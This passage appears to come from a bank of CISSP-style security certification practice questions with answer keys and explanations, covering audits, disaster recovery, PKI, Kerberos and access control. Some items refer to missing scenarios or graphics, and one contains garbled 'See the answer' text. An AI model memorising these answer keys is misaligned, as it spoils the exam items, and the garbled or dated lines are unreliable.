C. The most important practice when conducting internal audits is to ensure both that the results are actionable by operations staff and that their importance is well understood by the management team that is responsible for actions being taken. Otherwise, such audit activities present negative value, introducing liability for the organization by demonstrating institutional knowledge of weaknesses which then go unaddressed.

Which of the following statements is true with respect to security audits, vulnerability assessments, and penetration tests? A. Third-party security audits are only necessary when regulations require them. B. Vulnerability assessments and penetration tests are essentially the same. C. Vulnerability assessments help to prioritize weaknesses that need to be addressed. D. Internal assessments have very little value.

C. The most valuable aspect of vulnerability assessments, whether conducted internally or by a third party, is that they help to enumerate all of the potential vulnerabilities that an enterprise has so that remediation can be prioritized.

All of the following are types of tests for disaster recovery and business continuity plans except A. Structured walk-through test B. Simulation test C. Null hypothesis test D. Full-interruption test

C. The null hypothesis test is used in statistical analysis. Though it could conceivably be used to analyze the results of a DRP/BCP test, it would not be in and of itself a feasible way to test these plans.

CPUs and operating systems can work in two main types of multitasking modes. What controls access and the use of system resources in preemptive multitasking mode? A. The user and application. B. The program that is loaded into memory. C. The operating system. D. The CPU and user.

C. The operating system.

Which of the following best explains why John does not see anything suspicious on the reported systems? A. The systems have not yet been infected. B. He is not running the correct tools. He needs to carry out a penetration test on the two systems. C. Trojaned files have been loaded and executed. D. A back door has been installed and the attacker enters the system sporadically.

C. The other tools in the rootkit may vary, but they usually comprise utilities that are used to cover the attacker's tracks. For example, every operating system has basic utilities that a root or administrator user can use to detect the presence of the rootkit, an installed sniffer, and the back door. The hacker replaces these default utilities with new utilities, which share the same name. They are referred to as "Trojaned programs" because they carry out the intended functionality but do some devious activity in the background.

In disaster recovery planning, what is the recovery point objective? A. The point to which application data must be recovered to resume business operations. B.. The maximum elapsed time required to complete recovery of application data. C. The point to which application data must be recovered to resume system operations. D. The point to which information system must be operational at an alternate site.

C. The point to which application data must be recovered to resume system operations.

Why would a certificate authority revoke a certificate? A. If the user's public key has become compromised B. If the user changed over to using the PEM model that uses a web of trust C. If the user's private key has become compromised D. If the user moved to a new location

C. The reason a certificate is revoked is to warn others who use that person's public key that they should no longer trust the public key because, for some reason, that public key is no longer bound to that particular individual's identity. This could be because an employee left the company or changed his name and needed a new certificate, but most likely it is because the person's private key was compromised.

In this scenario, what would the 60-minute time period be referred to as? A. Recovery time period B. Maximum tolerable downtime C. Recovery point objective D. Recovery point time period

C. The recovery point objective (RPO) is the acceptable amount of data loss measured in time. This value represents the earliest point in time in which data must be recovered. The higher the business value of data, the more funds or other resources that can be put into place to ensure a smaller amount of data is lost in the event of a disaster.

in what order would a typical PKI infrastructure perform the following transactions? Receiver decrypts and obtains session key. Sender requests receiver's public key. Public key is sent from a public directory. Sender sends a session key encrypted with receiver's public key. A. iv, iii, ii, i B. ii, i, iii, iv C. ii, iii, iv, i D. ii, iv, iii, i

C. The sender would need to first obtain the receiver's public key, which could be from the receiver or a public directory. The sender needs to protect the symmetric session key as it is being sent, so she encrypts it with the receiver's public key. The receiver decrypts the session key with his private key.

Which of the following statements is true? A. A bottom-up approach to software testing allows interface errors to be detected earlier. B. A top-down approach to software testing allows errors in critical modules to be detected earlier. C. The software test plan and results should be retained as part of the system's permanent documentation. D. Black box software testing is required as part of procedural detail.

C. The software test plan and results should be retained as part of the system's permanent documentation.

Alice's company has decided to bulk mail post cards to their current and prospective customers, in hopes that they will return them along with feedback as to the services the company provides. She has been tasked with designing and developing the system that will be used to process the information returned, and has been instructed to ensure so that it will be most useful to direct management's business decisions for the next year. It is clear that automation will be required, including the scanning of the returned post cards, and likely some amount of optical character recognition to enable text-based processing of the responses. Given this scenario, which of the following statements is true? A. How the text-based data will be stored and accessed is only a concern of the project risk analysis. B. how text-based data will be stored and accessed is not a concern during project initiation. C. The storage and means of access of the resulting data is a matter of concern for a security risk analysis. D. the storage and means of access of the resulting data is not a matter of concern for a security risk analysis.

C. The storage and means of access of the resulting data is a matter of concern for a security risk analysis.

Which of the following best describes the difference between a warded lock and a tumbler lock? A. A tumbler lock is more simplistic and easier to circumvent than a warded lock. B. A tumbler lock uses an internal bolt, and a warded lock uses internal cylinders. C. A tumbler lock has more components than a warded lock. D. A warded lock is mainly used externally, and a tumbler lock is used internally.

C. The tumbler lock has more pieces and parts than a warded lock. The key fits into a cylinder, which raises the lock metal pieces to the correct height so the bolt can slide to the locked or unlocked position. A warded lock is easier to circumvent than a tumbler lock.

Which of the following is the correct sequence in the Kerberos authentication process with respect to passwords, Key Distribution Centers (KDCs), ticket granting servers (TGSs), ticket granting tickets (TGTs), services, and service tickets? A. The user provides a username/password to the workstation, the workstation obtains a TGT from the TGS, then subsequently obtains a service ticket from the KDC, which it presents to the service. B. The workstation obtains a TGT from the KDC, which the user then validates with a password. The TGT is then exchanged for a service ticket from the TGS, which is presented to the service. C. The user provides a username/password to the workstation, the workstation obtains a TGT from the KDC, then subsequently obtains a service ticket from the TGS, which it presents to the service. D. The user obtains a service ticket from the service. The user then validates this ticket with a username/password provided to the TGS, which results in a TGT that is further validated by the KDC in a final step.

C. The user must first authenticate to the workstation with a username and password. These credentials are then forwarded by the workstation to the authentication service (AS) on the KDC, which then returns a TGT encrypted with the TGS's secret key. Later, when a service is required, the TGT is presented back to the TGS that can authenticate it, and which then returns a service ticket encrypted with the service's secret key. When the service ticket is presented to the service, mutual authentication can occur: the service knows the user must be authentic, because the user couldn't have a valid service ticket without having authenticated to the KDC and TGS, and the user knows the service is authentic, because it can decrypt the service ticket.

Jeff is leading the business continuity group in his company. They have completed a business impact analysis and have determined that if the company's credit card processing functionality was unavailable for 48 hours the company would most likely experience such a large financial hit that it would have to go out of business. The team has calculated that this functionality needs to be up and running within 28 hours after experiencing a disaster for the company to stay in business. The team has also determined that the restoration steps must be able to restore data that is 60 minutes old or less. in this scenario, which of the following is the work recovery time value? A. 48 hours B. 28 hours C. 20 hours D. 1 hour

C. The work recovery time (WRT) is the remainder of the overall MTD value after RTO. RTO usually deals with getting the infrastructure and systems back up and running, and WRT deals with restoring data, testing processes, and then making everything "live" for production purposes.

Systems that are built on the OSI framework are considered open systems. What does this mean? A. They do not have authentication mechanisms configured by default. B. They have interoperability issues. C. They are built with international protocols and standards so they can easily communicate with other systems. D. They are built with international protocols and standards so they can choose what types of systems they will communicate with.

C. They are built with international protocols and standards so they can easily communicate with other system

Internal audits are the preferred approach when which of the following is true? A.The organization lacks the organic expertise to conduct them. B. Regulatory requirements dictate the use of a third-party auditor. C. The budget for security testing is limited or nonexistent. D. There is concern over the spillage of proprietary or confidential information.

C. Third-party auditors are almost always fairly expensive, so if the organization's budget does not support their use, it may be necessary to use internal assets to conduct the audit.

An online transaction processing (OLTP) system that detects an invalid transaction should do which of the following? A. Roll back and rewrite over original data B. Terminate all transactions until properly addressed C. Write a report to be reviewed D. Checkpoint each data entry

C. This can seem like a tricky question. It states that the system has detected an invalid transaction, which is most likely a user error. This error should be logged so it can be reviewed. After the review, the supervisor, or whoever makes this type of decision, will decide whether or not it was a mistake and, if so, investigate it as needed. If the system had a glitch, power fluctuation, hang-up, or any other software- or hardware-related error, it would not be an invalid transaction, and in that case the system would carry out a rollback function.

If a programmer is restricted from updating and modifying production code, what is this an example of? A. Rotation of duties B. Due diligence C. Separation of duties D. Controlling input values

C. This is just one of several examples of separation of duties. A system must be set up for proper code maintenance to take place when necessary, instead of allowing a programmer to make changes arbitrarily. These types of changes should go through a change control process and should have more entities involved than just one programmer.

Which of the following statements is true with respect to vulnerability tests versus penetration tests? A. They are essentially the same. In most cases both terms may be used interchangeably. B. The goals between the two differ slightly, but are similar enough that they should be handled in effectively the same way. C. Many of the same tools and techniques are commonly employed regardless of which of the two tests is being conducted. D. Though the goals, tools, and techniques are distinctly different between the two, either approach can be an acceptable replacement for the other.

C. Though vulnerability assessments and penetration testing are very different activities with distinctly different goals, many of the same tools and techniques will necessarily be employed regardless of which type of test is being conducted.

It can be very challenging for programmers to know what types of security should be built into the software that they create. The amount of vulnerabilities, threats, and risks involved with software development can seem endless. Which of the following describes the best first step for developers to take to identify the security controls that should be coded into a software project? A. Penetration testing B. Regression testing C. Threat modeling D. Attack surface analysis

C. Threat modeling is a systematic approach used to understand how different threats could be realized and how a successful compromise could take place. A threat model is created to define a set of possible attacks that can take place so the necessary countermeasures can be identified and implemented. Through the use of a threat model, the software team can identify and rate threats. Rating the threats based upon the probability of exploitation and the associated impact of each exploitation allows the team to focus on the threats that present the greatest risk. When using threat modeling in software development, the process starts at the design phase and should continue in an iterative process through each phase of the software's life cycle. Different software development threat modeling approaches exist, but they have many of the same steps, including identifying assets, trust boundaries, data flows, entry points, privilege code, etc. This approach also includes building attack trees, which represent the goals of each attack and the attack methodologies. The output of all of these steps is then reviewed and security controls selected and coded into the software.

Use the following scenario to answer Questions 27-28. Tim is the CISO for a large distributed financial investment organization. The company's network is made up of different network devices and software applications, which generate their own proprietary logs and audit data. Tim and his security team have become overwhelmed with trying to review all of the log files when attempting to identify if anything suspicious is taking place within the network. Another issue Tim's team needs to deal with is that many of the network devices have automated IPv6-to-IPv4 tunneling enabled by default. Which of the following is the best solution for this company to implement as it pertains to the first issue addressed in the scenario? A. Event correlation tools B. Intrusion detection systems C. Security information and event management D. Security event correlation management tools

C. Today, more organizations are implementing security event management (SEM) systems, also called security information and event management (SIEM) systems. These products gather logs from various devices (servers, firewalls, routers, etc.) and attempt to correlate the log data and provide analysis capabilities. We also have different types of systems on a network (routers, firewalls, IDS, IPS, servers, gateways, proxies) collecting logs in various proprietary formats, which requires centralization, standardization, and normalization. Log formats are different per product type and vendor

Which type of WAN tunneling protocol is missing from the right table in the graphic that follows? A. IPSec B. FDDI C. L2TP D. CSMA/CD

C. Tunneling is the main ingredient to a VPN because that is how the VPN creates its connection. Three main tunneling protocols are used in VPN connections: PPTP, L2TP, and IPSec. L2TP provides the functionality of the Point-to-Point Tunneling Protocol (PPTP), but it can work over networks other than just IP, and it provides a higher level of security when combined with IPSec. L2TP does not provide any encryption or authentication services, so it needs to be combined with IPSec if those services are required. The processes that L2TP uses for encapsulation are similar to those used by PPTP. The PPP frame is encapsulated with L2TP. One limitation of PPTP is that it can work only over IP networks, so other protocols must be used to move data over frame relay, X.25, and ATM links.

What markup language allows for the sharing of application security policies to ensure that all applications are following the same security rules? A. XML B. SPML C. XACML D. GML

C. Two or more companies can have a trust model set up to share identity, authorization, and authentication methods. This means that if Bill authenticates to his company's software, this software can pass the authentication parameters to its partner's software. This allows Bill to interact with the partner's software without having to authenticate twice. This can happen through Extensible Access Control Markup Language (XACML), which allows two or more organizations to share application security policies based upon their trust model. XACML is a markup language and processing model that is implemented in XML. It declares access control policies and describes how to interpret them.

Security event logs can best be protected from tampering by which of the following? A. Encrypting the contents using asymmetric key encryption B. Ensuring every user has administrative rights on their own workstations C. Using remote logging over simplex communications media D. Storing the event logs on DVD-RW

C. Using a remote logging host raises the bar for attackers because if they are able to compromise one host, they would have to compromise the remote logger in order to tamper with the logs. The use of a simplex channel further hinders the attackers.

Which of the following is a bridge-mode technology that can monitor individual traffic links between virtual machines or can be integrated within a hypervisor component? A. Orthogonal frequency-division B. Unified threat management modem C. Virtual firewall D. Internet Security Association and Key Management Protocol

C. Virtual firewalls can be bridge-mode products, which monitor individual traffic links between virtual machines, or they can be integrated within the hypervisor. The hypervisor is the software component that carries out virtual machine management and oversees guest system software execution. If the firewall is embedded within the hypervisor, then it can "see" and monitor all the activities taking place within the one system.

Which of the following types of memory cannot be changed after it's written? A. RAM (Random Access Memory) B. Cache. C. WORM (Write once read Many) D. EPROM (Erasable and Programmable Read Only Memory)

C. WORM (Write once read Many)

Which of the following components should Tom make sure his team puts into place? A. Single sign-on module B. LDAP directory service synchronization C. Web access management D. X.500 database

C. Web access management (WAM) is a component of most IdM products that allows for identity management of web-based activities to be integrated and managed centrally.

As Hamid is reviewing IDM products and their specific characteristics, his boss calls him and tells him that the product also needs to allow for externally controlled access for the company's e-commerce operations. What functionality does Hamid need to ensure is part of the product he purchases? A. LDAP B. Directory services. C. Web access management. D. PKI.

C. Web access management.

What type of client ports should Don make sure the institution's software is using when client-to-server communication needs to take place? A. Well known B. Registered C. Dynamic D. Free

C. Well-known ports are mapped to commonly used services (HTTP, FTP, etc.). Registered ports are 1,024 to 49,151, and vendors register specific ports to map to their proprietary software. Dynamic ports (private ports) are available for use by any application.

A suspected crime has been reported within your organization. Which of the following steps should the incident response team take first? A. Establish a procedure for responding to the incident. B. Call in forensic experts. C. Determine that a crime has been committed. D. Notify senior management.

C. When a suspected crime is reported, the incident response team should follow a set of predetermined steps to ensure uniformity in their approach and make sure no steps are skipped. First, the incident response team should investigate the report and determine that an actual crime has been committed. If the team determines that a crime has been carried out, senior management should be informed immediately. At this point, the company must decide if it wants to conduct its own forensic investigation or call in external experts.

Sally has found out that software programmers in her company are making changes to software components and uploading them to the main software repository without following version control or documenting their changes. This is causing a lot of confusion and has caused several teams to use the older versions. Which of the following would be the best solution for this situation? A. Software change control management B. Software escrow C. Software configuration management D. Software configuration management escrow

C. When changes take place to a software product during its development life cycle, a configuration management system can be put into place that allows for change control processes to take place through automation. A product that provides software configuration management (SCM) identifies the attributes of software at various points in time and performs a methodical control of changes for the purpose of maintaining software integrity and traceability throughout the software development life cycle. It defines the need to track changes and provides the ability to verify that the final delivered software has all of the approved changes that are supposed to be included in the release. During a software development project, the centralized code repositories are often kept in systems that can carry out SCM functionality, which manages and tracks revisions made by multiple people against a single master set.

George is the security manager of a large bank, which provides online banking and other online services to its customers. George has recently found out that some of the bank's customers have complained about changes to their bank accounts that they did not make. George worked with the security team and found out that all changes took place after proper authentication steps were completed. Which of the following describes what most likely took place in this situation? A. Web servers were compromised through cross-scripting attacks. B. TLS connections were decrypted through a man-in-the-middle attack. C. Personal computers were compromised with Trojan horses that installed keyloggers. D. Web servers were compromised and masquerading attacks were carried out.

C. While all of these situations could have taken place, the most likely attack type in this scenario is the use of a keylogger. Attackers commonly compromise personal computers by tricking the users into installing Trojan horses that have the capability to install keystroke loggers. The keystroke logger can capture authentication data that the attacker can use to authenticate as a legitimate user and carry out malicious activities.

Which of the following is NOT an important practice when facilitating a third-party audit? A. Ensure that the internal teams responsible for the systems and controls under audit are keenly aware of the requirements, methodology, and framework for the assessment. B. Conduct an internal audit ahead of time, using the same framework and methodology that the third party will use so that there are no surprises. C. Keep the details of the progress and findings of the third-party assessment tightly confidential, disclosing the results to management only once they have been finalized, so as to avoid unnecessary alarm or managerial interference. D. Be prepared to facilitate the third party's inspection of internal systems, but also to maintain control of them at all times in case the auditors' activities threaten to cause inadvertent disruption or other adverse effects.

C. While it is certainly the case that preliminary findings may be inaccurate, and hence cause some amount of unnecessary alarm if viewed without proper context, management must be kept apprised of the auditors' activities and discoveries at all times. Management still bears the responsibility of operating the business, which includes responding to adverse conditions, even as the audit effort is ongoing.

Which of the following best describes an application of cryptography to protect data at rest? A. VPN B. Degaussing C. Whole-disk encryption D. Up-to-date antivirus software

C. Whole-disk encryption

What is the standard used for PKI certificates? A. X.400 B. X.500 C. X.509 D. Ldap

C. X.509

Which of the following best describes the type of vulnerability mentioned in this scenario? A. Dynamic vulnerability that is polymorphic B. Static vulnerability that is exploited by server-side injection parameters C. Vulnerability that does not currently have an associated solution D. Database vulnerability that directly affects concurrency

C. Zero-day vulnerabilities are vulnerabilities that do not currently have a resolution. If a vulnerability is identified and there is not a pre-established fix (patch, configuration, update), it is considered a zero day. A zero-day attack is an attack that exploits a previously unknown vulnerability in a system, meaning that the attack occurs between the time it is identified and the solution is prepared—that is, on "day zero" of the awareness of the vulnerability. This leaves zero days for the victim to react and apply a patch to the vulnerability.

Which ares of a company are business plans recommended for? A. The most important operational and financial areas. B. The areas that house the critical systems. C. all areas. D. The areas that the company cannot survive without.

C. all areas.

Mike's team has decided to hire and deploy security guards to monitor activities within the company's facility. Which of the categories listed in the scenario does this countermeasure map to? A. delaying. B. detection. C. assessment. D. Recall.

C. assessment.

A security measure has recently been put into place within the accounting department. All users within a specified clearance level have been permanently tied to a database with an equal classification level. This method of joining a subject to an object is referred to as: A. isolating B. strapping. C. binding D. mandating.

C. binding

Which of the following statements is true? A. development staff should implement systems. B. development staff should support production data. C. development staff should perform unit testing. D. development staff should perform acceptance testing.

C. development staff should perform unit testing.

Which of the following is not a physical access control? A. turnstiles B. fencing. C. host-based IDS. D. Exterior lighting.

C. host-based IDS.

Which of the following has an incorrect definition mapping? i. Civil (code) law - based on previous interpretations of law ii. Common law - rule-based law not precedence based. iii customary law - deals mainly with personal conduct and patterns of behavior. iv religious law - systems based on religious beliefs of the region. A. i, iii B. i, ii, iii C. i, ii D. iv

C. i, ii

The Kerberos Technology has some issues that need to be understood before implementation, which of the following are issues pertaining to Kerberos? i. The KDC can be a single point of failure. If the KDC goes down, no one can access needed resources. Redundancy is necessary for the KDC. ii. The KDC must be able to handle the number of requests it receives in a timely manner. It must be scalable. iii. Secret keys are temporarily stored on the users' workstations, which means it is possible for an intruder to obtain these crytographic keys. iv. Session keys are decrypted and reside on the users' workstations, either in a cache or in a key table, Again, an intruder can capture these keys. A. i, ii, iv B. i, iii, iv C. i, ii, iii, iv D. ii, iii

C. i, ii, iii, iv

The information security industry is made up of various best practices, standards, models, and frameworks. Some were not developed first with security in mind but can be integrated into an organizational security program to help in its effectiveness and efficiency. It is important to know of all of these different approaches so that an organization can choose the ones that best fit its business needs and culture. Which of the following best describes the approach(es) that should be put into place if an organization wants to integrate a way to improve its security processes over a period of time? Information Technology Infrastructure Library should be integrated because it allows for the mapping of IT service process management, business drivers, and security improvement. Six Sigma should be integrated because it allows for the defects of security processes to be identified and improved upon. Capability Maturity Model Integration should be integrated because it provides distinct maturity levels. The Open Group Architecture Framework should be integrated because it provides a structure for process improvement. A. i, iii B. ii, iii, iv C. ii, iii D. ii, iv

C. ii, iii

Asymmetric cryptography has all the following strengths, except: A. it is scalable. B. It is considered efficient in key exchange and digital signing. C. it is extremely fast. D. it has easier key management issues than symmetric cryptography.

C. it is extremely fast.

Which of the following are effective methods of preventing data Remanence on solid-state devices (SSDs)? i. clearing ii. Purging iii. Degaussing iv. Destruction A. i, ii B. i. iii. iv C. iv D. All of the above

C. iv Destruction

The international standards bodies ISO and IEC developed a series of standards that are used in organizations around the world to implement and maintain information security management systems. The standards were derived from the British Standard 7799, which was broken down into two main pieces. Organizations can use this series of standards as guidelines, but can also be certified against them by accredited third parties. Which of the following are incorrect mappings pertaining to the individual standards that make up the ISO/IEC 27000 series? ISO/IEC 27001 outlines ISMS implementation guidelines, and ISO/IEC 27003 outlines the ISMS program's requirements. ISO/IEC 27005 outlines the audit and certification guidance, and ISO/IEC 27002 outlines the metrics framework. ISO/IEC 27006 outlines the program implementation guidelines, and ISO/IEC 27005 outlines risk management guidelines. ISO/IEC 27001 outlines the code of practice, and ISO/IEC 27004 outlines the implementation framework. A. i, iii B. i, ii C. ii, iii, iv D i, ii, iii, iv

D i, ii, iii, iv

IEEE ___________ provides a unique ID for a device. IEEE ____________ provides data encryption, integrity, and origin authentication functionality. IEEE __________ carries out key agreement functions for the session keys used for data encryption. Each of these standards provides specific parameters to work within an IEEE ___________ framework. A. 802.1AF, 802.1AE, 802.1AR, 802.1X EAP-TLS B. 802.1AT, 802.1AE, 802.1AM, 802.1X EAP-SSL C. 802.1AR, 802.1AE, 802.1AF, 802.1X EAP-SSL D. 802.1AR, 802.1AE, 802.1AF, 802.1X EAP-TLS

D. 802.1AR provides a unique ID for a device. 802.1AE provides data encryption, integrity, and origin authentication functionality. 802.1AF carries out key agreement functions for the session keys used for data encryption. Each of these standards provides specific parameters to work within an 802.1X EAP-TLS framework.

There are several types of attacks that programmers need to be aware of. What attack does the graphic that follows illustrate? A. Traffic analysis B. Race condition C. Covert storage D. Buffer overflow

D. A buffer is an area reserved by an application to store something in it, like some user input. After the application receives the input, an instruction pointer points the application to do something with the input that's been put in the buffer. A buffer overflow occurs when an application erroneously allows an invalid amount of input to be written into the buffer area, overwriting the instruction pointer in the code that told the program what to do with the input. Once the instruction pointer is overwritten, whatever code has been placed in the buffer can then be executed, all under the security context of the application.

Which of the following is a representation of the logical relationship between elements of data and dictates the degree of association among elements, methods of access, processing alternatives, and the organization of data elements? A. Data element B. Array C. Secular component D. Data structure

D. A data structure is a representation of the logical relationship between elements of data. It dictates the degree of association among elements, methods of access, processing alternatives, and the organization of data elements. The structure can be simple in nature, like the scalar item, which represents a single element that can be addressed by an identifier and accessed by a single address in storage. The scalar items can be grouped in arrays, which provide access by indexes. Other data structures include hierarchical structures by using multilinked lists that contain scalar items, vectors, and possibly arrays. The hierarchical structure provides categorization and association.

Which of the following statements is most true with regard to internal security audits versus external, second-party audits? A. Internal audits aren't as valid as external, second-party audits because the insiders conducting them have an unrealistic advantage over real attackers due to their knowledge of the systems being inspected. B. Due to insider knowledge, internal audits require less technical skill to perform and so are more cost-effective than external, second-party audits. C. Internal audits provide no logistical advantage over external, second-party audits because in either case, management must schedule around disparate teams and routine program activities. D. The advantage in the knowledge that an inside team has in conducting an internal audit is illusory, as advanced adversaries often approach or exceed the level of knowledge the inside team possesses.

D. A dedicated and persistent adversary will likely gain a level of knowledge of their target that rivals or exceeds that of the internal audit team, both in breadth and accuracy. Further, their reconnaissance will likely be much more targeted than an internal team will leverage, and will be better aware of their own goals than the defender imagines.

Which of the following best describes a digital signature? A. A method of transferring a handwritten signature to an electronic document B. A method to encrypt confidential information C. A method to provide an electronic signature and encryption D. A method to let the receiver of the message prove the source and integrity of a message

D. A digital signature provides authentication (knowing who really sent the message), integrity (because a hashing algorithm is involved), and nonrepudiation (the sender cannot deny sending the message).

"Subjects can %access resources in domains of equal or lower trust levels.: This is an easy sentence, but a difficult concept for many people to really understand. Which of the following is not an example of this concept? A. The security officer can access over 80% of the files within a company. B. A contractor is only given access to three files on one file server. C. A security kernel process can access all processes within an operating system. D. A guest account has access to all administrator accounts in the domain.

D. A guest account has access to all administrator accounts in the domain.

Which of the following is not a property or characteristic of a one-way hash function? A. It converts a message of arbitrary length into a value of fixed length. B. Given the digest value, it should be computationally infeasible to find the corresponding message. C. It should be impossible or rare to derive the same digest from two different messages. D. It converts a message of fixed length to an arbitrary length value.

D. A hashing algorithm will take a string of variable length (the message can be any size) and compute a fixed-length value. The fixed-length value is the message digest. The MD family creates the fixed-length value of 128 bits, and SHA creates one of 160 bits.

Which best describes the approach Sandy's team member took when creating the business-oriented software package mentioned within the scenario? A. Software as a Service B. Cloud computing C. Web services D. Mashup

D. A mashup is the combination of functionality, data, and presentation capabilities of two or more sources to provide some type of new service or functionality. Open APIs and data sources are commonly aggregated and combined to provide a more useful and powerful resource

An operating system maintains several processes in memory at the same time. The processes can only interact with the CPU during their assigned time slices since there is only one CPU and many processes. Each process is assigned an interrupt value to allow for this type of time slicing to take place. Which of the following best describes the difference between maskable and non-maskable interrupts? A. A maskable interrupt is assigned to a critical process, and a nonmaskable interrupt is assigned to a noncritical process. B. A maskable interrupt is assigned to a process in ring 0, and a nonmaskable interrupt is assigned to a process in ring 3. C. A maskable interrupt is assigned to a process in ring 3, and a nonmaskable interrupt is assigned to a process in ring 4. D. A maskable interrupt is assigned to a noncritical process, and a nonmaskable interrupt is assigned to a critical process.

D. A maskable interrupt is assigned to an event that may not be overly important, and the programmer can indicate that if that interrupt calls, the program does not stop what it is doing. This means the interrupt is ignored. Nonmaskable interrupts can never be overridden by an application because the event that has this type of interrupt assigned to it is critical.

There are several different types of technologies within cryptography that provide confidentiality. What is represented in the graphic that follows? A. Running key cipher B.Concealment cipher C.Steganography D. One-time pad

D. A one-time pad is a perfect encryption scheme because it is considered unbreakable if implemented properly. A one-time pad uses a pad with random values that are XORed against the message to produce ciphertext. The plaintext message shown in the graphic that needs to be encrypted has been converted into bits, and our one-time pad is made up of random bits. This encryption process uses a binary mathematical function called exclusive-OR, usually abbreviated as XOR. The receiver must have the same one-time pad to decrypt the message by reversing the process

Which of the following is an incorrect description pertaining to the common components that make up computer systems? General registers are commonly used to hold temporary processing data, while special registers are used to hold process-characteristic data as in condition bits. A processor sends a memory address and a See the answer request down an address bus and a memory address and a See the answer request down an I/O bus. Process-to-process communication commonly takes place through memory stacks, which are made up of individually addressed buffer locations. A CPU uses a stack return pointer to keep track of the next instruction sets it needs to process. A. i B. i, ii C. ii, iii D. ii, iv

D. A processer sends a memory address and a "read" request down an address bus. The system reads data from that memory address and puts the requested data on the data bus. A CPU uses a program counter to keep track of the memory addresses containing the instruction sets it needs to process in sequence. A stack pointer is a component used within memory stack communication processes. An I/O bus is used by a peripheral device.

An approach to alternate offsite facilities is to establish a reciprocal agreement. Which of the following describes the pros and cons of a reciprocal agreement? A. It is fully configured and ready to operate within a few hours, but is the most expensive of the offsite choices. B. It is an inexpensive option, but it takes the most time and effort to get up and running after a disaster. C. It is a good alternative for companies that depend upon proprietary software, but annual testing is not usually available. D. It is the cheapest of the offsite choices, but mixing operations could introduce many security issues

D. A reciprocal agreement, also referred to as mutual aid, means that company A agrees to allow company B to use its facilities if company B is hit by a disaster, and vice versa. This is a cheaper way to go than the other offsite choices, but it is not always the best choice. Most environments are maxed out pertaining to the use of facility space, resources, and computing capability. To allow another company to come in and work out of the same shop could prove to be detrimental to both companies. The stress of two companies working in the same environment could cause tremendous levels of tension. If it did work out, it would only provide a short-term solution. Configuration management could be a nightmare, and the mixing of operations could introduce many security issues. Reciprocal agreements have been known to work well in specific businesses, such as newspaper printing. These businesses require very specific technology and equipment that will not be available through any subscription service. For most other organizations, reciprocal agreements are generally, at best, a secondary option for disaster protection.

How might one test adherence to the user accounts policy? A. User self-reporting B. Penetration testing C. Management review D. User records auditing

D. A records audit can verify that users have acknowledged acceptance of the policy, that accounts of departed users have been suspended, that users have the appropriate access to information, and many other aspects of the policy.

Which of the following best describes a certificate authority? A. An organization that issues private keys and the corresponding algorithms B. An organization that validates encryption processes C. An organization that verifies encryption keys D. An organization that issues certificates

D. A registration authority (RA) accepts a person's request for a certificate and verifies that person's identity. Then the RA sends this request to a certificate authority (CA), which generates and maintains the certificate.

Emily is listening to network traffic and capturing passwords as they are sent to the authentication server. She plans to use the passwords as part of a future attack. What type of attack is this? A. Brute-force attack B. Dictionary attack C. Social engineering attack D. Replay attack

D. A replay attack occurs when an intruder obtains and stores information and later uses it to gain unauthorized access. In this case, Emily is using a technique called electronic monitoring (sniffing) to obtain passwords being sent over the wire to an authentication server. She can later use the passwords to gain access to network resources. Even if the passwords are encrypted, the retransmission of valid credentials can be sufficient to obtain access.

Which is the best software architecture that Sandy should introduce her team to for effective business application use? A. Distributed component object architecture B. Simple Object Access Protocol architecture C. Enterprise JavaBeans architecture D. Service-oriented architecture

D. A service-oriented architecture (SOA) provides standardized access to the most needed services to many different applications at one time. This approach allows for different business applications to access the current web services available within the environment.

Which of the following incorrectly describes the concept of executive succession planning? A. Predetermined steps protect the company if a senior executive leaves. B. Two or more senior staff cannot be exposed to a particular risk at the same time. C. It documents the assignment of deputy roles. D. It covers assigning a skeleton crew to resume operations after a disaster.

D. A skeleton crew consists of the employees who carry out the most critical functions following a disaster. They are put to work first during the recovery process. A skeleton crew is not related to the concept of executive succession planning, which addresses the steps that will be taken to fill a senior executive role should that person retire, leave the company, or die. The objective of a skeleton crew is to maintain critical operations, while the objective of executive succession planning is to protect the company by maintaining leadership roles.

There are different ways that specific technologies can create one-time passwords for authentication purposes. What type of technology is illustrated in the graphic that follows? A. Counter synchronous token B. Asynchronous token C. Mandatory token D. Synchronous token

D. A synchronous token device synchronizes with the authentication service by using time or a counter as the core piece of the authentication process. If the synchronization is time based, as shown in this graphic, the token device and the authentication service must hold the same time within their internal clocks. The time value on the token device and a secret key are used to create the one-time password, which is displayed to the user. The user enters this value and a user ID into the computer, which then passes them to the server running the authentication service. The authentication service decrypts this value and compares it to the value it expected. If the two match, the user is authenticated and allowed to use the computer and resources.

What are the two general types of proximity identification devices? A. Biometric devices and access control devices B. Swipe card devices and passive devices C. Preset code devices and wireless devices D. User-activated devices and system sensing devices

D. A user-activated device requires the user to do something: swipe the card through the reader and/or enter a code. A system sensing device recognizes the presence of the card and communicates with it without the user needing to carry out any activity.

Before monitoring employees' activities, all of the following steps must be taken, except: A. A policy must be established. B. A policy must be distributed to all employees. C. Monitoring must be executed in a consistent manner. D. A warning system must be implemented as part of a trial phase.

D. A warning system must be implemented as part of a trial phase.

Which of the following is true regarding data retention requirements? A. Legal requirements for data retention are uniform across all regulated business sectors, and must be followed to reduce risk of criminal litigation. B. To comply with various data retention regulations, it is best to retain all data to the lengthiest legal requirements. C. Retaining the largest amount of data possible makes responding to electronic discovery (e-discovery) orders easier and more straightforward. D. A well-documented policy for the retention of data is a minimum but necessary component of regulatory compliance.

D. A well-documented policy for the retention of data is a minimum but necessary component of regulatory compliance.

An access control matrix is used in many operating systems and applications to control access between subjects and objects. What is the column in this type of matrix referred to as? A. Capability table B. Constrained interface C. Role-based value D. ACL

D. Access control lists (ACLs) map values from the access control matrix to the object. Whereas a capability corresponds to a row in the access control matrix, the ACL corresponds to a column of the matrix. ACLs are used in several operating systems, applications, and router configurations. They are lists of subjects that are authorized to access specific objects, and they define what level of authorization is granted. Authorization can be specified to an individual or group. So the ACL is bound to an object and indicates which subjects can access it, and a capability table is bound to a subject and indicates which objects that subject can access.

Which of the following are key elements of secure coding practices? A. Using object-oriented languages instead of procedural ones, and heeding compiler warnings B. Ensuring that quality assurance is thorough, and performed by multiple teams C. Parallel programming, agile methodologies, and iterative testing D. Validating inputs, adhering to the least privilege principle, and keeping code as simple as possible

D. According to the Carnegie Mellon University's Software Engineering Institute (SEI), the "top 10" secure coding practices (as of May 2018) include these three items, as well as the following seven others: Heeding compiler warnings Architecting and designing for security policies Default deny Sanitizing outputs Practicing defense in depth Using effective quality assurance techniques Adopting a secure coding standard

